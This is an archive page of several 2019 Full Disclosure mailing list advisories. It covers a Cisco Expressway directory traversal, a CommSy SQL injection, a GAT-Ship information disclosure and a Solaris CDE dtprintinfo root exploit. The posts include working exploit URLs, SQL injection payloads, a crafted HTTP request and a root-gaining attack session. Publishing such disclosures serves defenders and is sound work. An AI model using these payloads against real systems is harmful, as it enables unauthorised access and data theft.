[FD] [RT-SA-2019-002] Directory Traversal in Cisco Expressway Gateway

2019-05-17 Thread RedTeam Pentesting GmbH
Advisory: Directory Traversal in Cisco Expressway Gateway

RedTeam Pentesting discovered a directory traversal vulnerability in
Cisco Expressway which enables access to administrative web interfaces.


Details
===

Product: Cisco Expressway Gateway
Affected Versions: 11.5.1, possibly others
Fixed Versions: See Cisco Bug ID CSCvo47769 [1]
Vulnerability Type: Directory Traversal
Security Risk: medium
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-expressway-traversal
Vendor Status: fixed version released
Vendor ID: Cisco Bug ID CSCvo47769
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-002
Advisory Status: published
CVE: CVE-2019-1854
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1854


Introduction


"Cisco Expressway offers users outside your firewall simple, highly
secure access to all collaboration workloads, including video, voice,
content, IM, and presence. Collaborate with people who are on
third-party systems and endpoints or in other companies. Help
teleworkers and Cisco Jabber mobile users work more effectively on their
device of choice."
(from the Cisco Expressway Series website [2]) 


More Details


Cisco Expressway Gateway is a kind of reverse proxy which implements
authentication mechanisms and forwards authorised requests to services
based on information encoded within the requested URL. It supports two
different URI layouts. The first layout only includes the base64-encoded
domain name of the gateway itself:


https://example.com:8443/$(echo -n example.com|base64)/test123

https://example.com:8443/ZXhhbXBsZS5jb20=/test123


The second layout additionally specifies the protocol, hostname and port
number of a target system which is to be contacted through the gateway:


https://example.com:8443/$(echo -n 
example.com/https/example.int/8443|base64)/test123

https://example.com:8443/ZXhhbXBsZS5jb20vaHR0cHMvZXhhbXBsZS5pbnQvODQ0Mw==/test123


RedTeam Pentesting analysed a Cisco Unified Communication Manager (CUCM)
instance which was accessible via a Cisco Expressway Gateway. In this
configuration, a directory traversal vulnerability was identified. It
leverages the methodology described in "Breaking Parser Logic" [3] by
Orange Tsai. The CUCM service, which is implemented using the Tomcat [4]
application server, interprets URLs different to the upstream
reverse proxy. By accessing a specially crafted URL, attackers can
access the CUCM manager application, even though it is not exposed by
the Cisco Expressway Gateway.


Proof of Concept


First, an attacker must authenticate to the Cisco Expressway Gateway.
A login can be performed by accessing the following URL using
HTTP-Basic-Authentication:


https://example.com:8443/ZXhhbXBsZS5jb20=/get_edge_config


Afterwards, the resources on the CUCM may be accessed through the Cisco
Expressway Gateway. By inserting repeated occurrences of "/..;/" into
the URL, the directory traversal vulnerability can be exploited. Using
the following URL, a list of applications installed on the CUCM system
can be retrieved:


https://example.com:8443/ZXhhbXBsZS5jb20vaHR0cHMvZXhhbXBsZS5pbnQvODQ0Mw==/cucm-uds/user/example_user/..;/..;/..;/


Similarly, the CUCM manager application can be accessed as follows:


https://example.com:8443/ZXhhbXBsZS5jb20vaHR0cHMvZXhhbXBsZS5pbnQvODQ0Mw==/cucm-uds/user/example_user/..;/..;/..;/ccmadmin



Workaround
==

Prevent access to the Cisco Expressway Gateway by untrusted parties.


Fix
===

See Cisco Bug ID CSCvo47769 [1] for affected software releases and
available patches.


Security Risk
=

The vulnerability can be used to access administrative interfaces which
are usually not reachable. Attackers could potentially read or modify
sensitive information via these interfaces. However, it is necessary to
have an authorised user account to access the Cisco Expressway Gateway.
Therefore, the vulnerability poses a medium risk.


Timeline


2019-02-01 Vulnerability identified
2019-02-20 Customer approved disclosure to vendor
2019-02-21 Vendor notified
2019-02-21 Receipt of advisory acknowledged by vendor
2019-04-16 Vendor announces public disclosure for May 1st to RedTeam 

[FD] [CVE-2019-11880] CommSy <= 8.6.5 - SQL injection

2019-05-17 Thread Jens Regel | Schneider & Wulf
Title:
==
CommSy <= 8.6.5 - SQL injection

Researcher:
===
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
===
CVE-2019-11880

Timeline:
=
2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Send details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure

Affected Products:
==
CommSy <= 8.6.5

Vendor Homepage:

https://www.commsy.net

Details:

CommSy is a web-based community system, originally developed at the
University of Hamburg, Germany, to support learning/working communities.
We have discovered a unauthenticated SQL injection vulnerability in
CommSy <= 8.6.5 that makes it possible to read all database content. The
vulnerability exists in the HTTP GET parameter "cid".

Proof of Concept:
=
boolean-based blind:
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD=context=login

error-based:
commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
COUNT(*),CONCAT(0x716a767871,(SELECT
(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs=context=login

time-based blind:
commsy.php?cid=101" AND SLEEP(5)-- MjJM=context=login

Fix:

According to the manufacturer, the version branch 8.6 is no longer
supported and the vulnerability will not be fixed. Customers should
update to the newest version 9.2.



signature.asc
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability

2019-05-17 Thread gionreale

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability


It is possible in versions 1.30 and below for unauthenticated attackers to 
query the GAT-Ship Web Module for system information via a crafted request:

PoC:
---

POST /ws/gatshipWs.asmx/SqlVersion  HTTP/1.1
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 
Firefox/52.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/json; charset=utf-8
 X-Requested-With: XMLHttpRequest 
 Content-Length: 2
 DNT: 1
 Connection: close
 
 {}

--




HTTP/1.1 200 OK
 Cache-Control: private, max-age=0
 Content-Type: application/json; charset=utf-8
 Server: Microsoft-IIS/X.X
 X-AspNet-Version: X.X.X
 X-Powered-By: ASP.NET
 Date: Mon, XX XXX 20XX 06:55:31 GMT
 Connection: close
 Content-Length: 310
 
 
{"d":{"__type":"webModule.ws.gatshipWs+ResponsObject","ResponsType":0,"MessageText":null,"Data":"Microsoft
 SQL Server 20XX (SPX) - XX.X..X (X64) \n\tDec 28 20XX 20:23:12 
\n\tCopyright (c) Microsoft Corporation\n\tStandard Edition (64-bit) on Windows 
XX XX \u003cX64\u003e (Build : Service Pack X)\n"}}

===

Values in PoC removed for security reasons.


Disclosed: 16 Jul 2018

Fix: Upgrade to current version.


Discovered by Gionathan Armando Reale


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] local privilege escalation via CDE dtprintinfo

2019-05-17 Thread Marco Ivaldi
Dear Full Disclosure,

Please find attached an advisory for the following vulnerability:

A buffer overflow in the DtPrinterAction::PrintActionExists() function in the
Common Desktop Environment 2.3.0 and earlier, as used in Oracle Solaris 10 1/13
(Update 11) and earlier, allows local users to gain root privileges via a long
printer name passed to dtprintinfo by a malicious lpstat program.

Note that Oracle Solaris CDE is based on the original CDE 1.x train, which is
different from the CDE 2.x codebase that was later open sourced. Most notably,
the vulnerable buffer in the Oracle Solaris CDE is stack-based, while in the
open source version it is heap-based.

This is a 0day vulnerability demonstrated at #INFILTRATE19 on May 2nd, 2019 in
the talk "A bug's life: story of a Solaris 0day".

For further information, refer to the following links:
https://vimeo.com/335197685
https://github.com/0xdea/raptor_infiltrate19 

Regards,

-- 
Marco Ivaldi, SAT Manager
CISSP, OSCP, QSA, ASV, OPSA, OPST, OWSE, LA27001, PRINCE2F
@Mediaservice.net S.r.l. con Socio Unico
https://www.mediaservice.net/
@Mediaservice.net (Cybaze Group) Security Advisory #2019-01 (updated on 
2019-05-08)

 Title: Local privilege escalation via CDE dtprintinfo
   Application: Common Desktop Environment 2.3.0 and earlier
 Platforms: Oracle Solaris 10 1/13 (Update 11) and earlier
Other platforms are potentially affected (see below)
   Description: A local attacker can gain root privileges by exploiting
a buffer overflow in CDE dtprintinfo
Author: Marco Ivaldi 
   Contributor: Dave Aitel  (original discovery)
 Vendor Status:  notified on 2019-05-05
 notified on 2019-05-05
   CVE: The Common Vulnerabilities and Exposures project has not 
assigned
a name to this issue yet
References: 
https://lab.mediaservice.net/advisory/2019-01-cde-dtprintinfo.txt
https://github.com/0xdea/raptor_infiltrate19
https://sourceforge.net/p/cdesktopenv/wiki/Home/
https://www.oracle.com/technetwork/server-storage/solaris10/
https://www.mediaservice.net/
https://infiltratecon.com/

1. Abstract.

A buffer overflow in the DtPrinterAction::PrintActionExists() function in the
Common Desktop Environment 2.3.0 and earlier, as used in Oracle Solaris 10 1/13
(Update 11) and earlier, allows local users to gain root privileges via a long
printer name passed to dtprintinfo by a malicious lpstat program.

Note that Oracle Solaris CDE is based on the original CDE 1.x train, which is
different from the CDE 2.x codebase that was later open sourced. Most notably,
the vulnerable buffer in the Oracle Solaris CDE is stack-based, while in the
open source version it is heap-based.

This is a 0day vulnerability demonstrated at #INFILTRATE19 on May 2nd, 2019 in
the talk "A bug's life: story of a Solaris 0day".

2. Example Attack Session.

bash-3.2$ cat /etc/release
Oracle Solaris 10 1/13 s10x_u11wos_24a X86
  Copyright (c) 1983, 2013, Oracle and/or its affiliates. All rights reserved.
Assembled 17 January 2013
bash-3.2$ uname -a
SunOS nostalgia 5.10 Generic_147148-26 i86pc i386 i86pc
bash-3.2$ id
uid=54322(raptor) gid=1(other)
bash-3.2$ gcc raptor_dtprintname_intel.c -o raptor_dtprintname_intel -Wall
bash-3.2$ ./raptor_dtprintname_intel 192.168.1.1:0
raptor_dtprintname_intel.c - dtprintinfo 0day, Solaris/Intel
Copyright (c) 2004-2019 Marco Ivaldi 

Using SI_PLATFORM   : i86pc (5.10)
Using stack base: 0x8047fff
Using rwx_mem address   : 0xfeffa004
Using sc address: 0x8047f60
Using strcpy() address  : 0xfefe26a0

lpstat called with -v
lpstat called with -v
lpstat called with -d
# id
uid=0(root) gid=1(other)

3. Affected Platforms.

All platforms shipping the Common Desktop Environment are potentially affected.
This includes:

* Oracle Solaris 10 1/13 (Update 11) and earlier [default installation]

According to the CDE Wiki, the following platforms are officially supported:

* All Official Ubuntu variants 12.04 - 18.04
* Debian 6, 7, 8, 9
* Fedora 17 at least
* Archlinux
* Red Hat
* Slackware 14.0
* OpenBSD
* NetBSD
* FreeBSD 9.2, 10.x, 11.x
* openSUSE Tumbleweed (gcc7)
* openSUSE Leap 4.2 (gcc4)
* SUSE 12 SP3 (gcc4)
* Solaris, OpenIndiana

4. Fix.

The maintainers of the open source CDE 2.x version have issued the following
patches for this vulnerability:

https://sourceforge.net/p/cdesktopenv/code/ci/30cd56ac389fbab521c52669a3bd25041d4e1df1/
https://sourceforge.net/p/cdesktopenv/code/ci/05d231606ebe3658712a36017d16ec3cc349145d/
https://sourceforge.net/p/cdesktopenv/code/ci/d59ec197e5307ad9650b6518dba67b7ef388f053/

Oracle, which maintains a different CDE codebase based on the 1.x train, is 
investigating the issue via tracking# S1153109 and is expected to release a fix
for all affected-supported versions of Solaris via their quarterly Critical
Patch Update